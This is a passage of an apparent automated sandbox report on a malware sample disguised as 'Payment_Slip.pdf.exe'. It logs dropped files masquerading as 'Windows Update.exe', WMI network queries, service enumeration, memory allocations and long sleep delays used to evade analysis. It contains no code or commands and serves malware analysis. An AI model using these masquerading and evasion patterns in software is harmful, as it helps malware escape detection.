                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Source: Yara matchFile source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0040E18D Sleep,ExitProcess,11_2_0040E18D
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0040E18D Sleep,ExitProcess,17_2_0040E18D
                              Source: C:\Users\user\AppData\Roaming\host.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeMemory allocated: A30000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeMemory allocated: 23A0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeMemory allocated: 43A0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeMemory allocated: 8410000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeMemory allocated: 9410000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeMemory allocated: 9620000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeMemory allocated: A620000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeMemory allocated: 2EF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeMemory allocated: 5100000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeMemory allocated: 8D80000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeMemory allocated: 74E0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeMemory allocated: 9D80000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeMemory allocated: AD80000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Roaming\host.exeMemory allocated: BD0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Roaming\host.exeMemory allocated: 2690000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Roaming\host.exeMemory allocated: BD0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeMemory allocated: 2DA0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeMemory allocated: 2FA0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeMemory allocated: 4FA0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeMemory allocated: 1820000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeMemory allocated: 31D0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeMemory allocated: 51D0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeMemory allocated: B70000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeMemory allocated: 2510000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeMemory allocated: 4510000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeMemory allocated: F00000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeMemory allocated: 29B0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeMemory allocated: 49B0000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeMemory allocated: 1590000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeMemory allocated: 2F30000 memory reserve | memory write watch
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeMemory allocated: 4F30000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040DD85
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,11_2_004186FE
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,17_2_004186FE
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 1200000
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 1199875
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 1199765
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 1199655
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 1199546
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 1199437
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 600000
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 599875
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 599765
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 599644
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 599441
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 599263
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 599155
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 599047
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598937
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598828
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598710
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598594
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598484
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598375
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598265
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598156
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 598043
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597937
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597828
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597718
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597609
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597500
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597390
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597281
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597168
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 597051
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 596922
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 596812
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 596687
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 596532
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 596406
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 596296
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 596187
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 596078
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 595968
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 595859
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 595750
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 595640
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 595531
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 595422
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 595312
                              Source: C:\Users\user\AppData\Roaming\host.exeThread delayed: delay time: 595203
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1200000
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199875
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199758
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199631
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199380
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199078
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 600000
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599869
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599764
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599656
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599546
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599437
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599328
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599218
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599109
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598999
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598889
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598781
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598669
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598562
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598453
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598343
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598234
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598124
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598012
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597906
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597796
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597397
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597281
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597171
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597062
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596952
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596843
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596734
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596624
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596515
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596406
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596296
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596187
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596077
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595968
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595859
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595749
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595640
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595531
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595421
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595312
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595202
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595041
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 594935
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 594820
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 594718
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1200000
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199890
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199781
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199672
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 1199530
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 600000
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599875
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599765
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599656
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599547
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599437
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599328
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599219
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599109
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 599000
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598890
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598781
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598662
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598531
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598422
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598250
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598124
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 598015
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597906
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597797
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597687
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597578
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597468
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597358
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597250
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597140
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 597029
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596921
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596812
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596703
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596593
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596484
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596375
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596265
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596156
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 596046
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595937
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595827
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595714
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595588
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595359
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeThread delayed: delay time: 595250
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6663Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3087Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeWindow / User API: threadDelayed 1007Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeWindow / User API: threadDelayed 8521Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeWindow / User API: foregroundWindowGot 1735Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\host.exeWindow / User API: threadDelayed 4895
                              Source: C:\Users\user\AppData\Roaming\host.exeWindow / User API: threadDelayed 4899
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWindow / User API: threadDelayed 4837
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeWindow / User API: threadDelayed 4878
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWindow / User API: threadDelayed 3777
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWindow / User API: threadDelayed 6042
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWindow / User API: threadDelayed 5250
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWindow / User API: threadDelayed 4533
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWindow / User API: threadDelayed 6915
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeWindow / User API: threadDelayed 2929
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWindow / User API: threadDelayed 5278
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeWindow / User API: threadDelayed 4521
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeAPI coverage: 5.1 %
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeAPI coverage: 4.6 %
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 8080Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5764Thread sleep count: 209 > 30Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5764Thread sleep time: -104500s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292Thread sleep count: 1007 > 30Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292Thread sleep time: -3021000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292Thread sleep count: 8521 > 30Jump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292Thread sleep time: -25563000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe TID: 7876Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\svchost.exe TID: 7712Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Windows\System32\svchost.exe TID: 8004Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -31359464925306218s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -1200000s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -1199875s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -1199765s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -1199655s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -1199546s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -1199437s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -600000s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -599875s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -599765s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -599644s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -599441s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -599263s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -599155s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -599047s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -598937s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -598828s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -598710s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -598594s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -598484s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -598375s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -598265s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -598156s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -598043s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -597937s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -597828s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -597718s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -597609s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -597500s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -597390s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -597281s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -597168s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -597051s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -596922s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -596812s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -596687s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -596532s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -596406s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -596296s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -596187s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -596078s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -595968s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -595859s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -595750s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -595640s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -595531s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -595422s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -595312s >= -30000s
                              Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160Thread sleep time: -595203s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exe TID: 7888Thread sleep time: -37815825351104557s >= -30000s
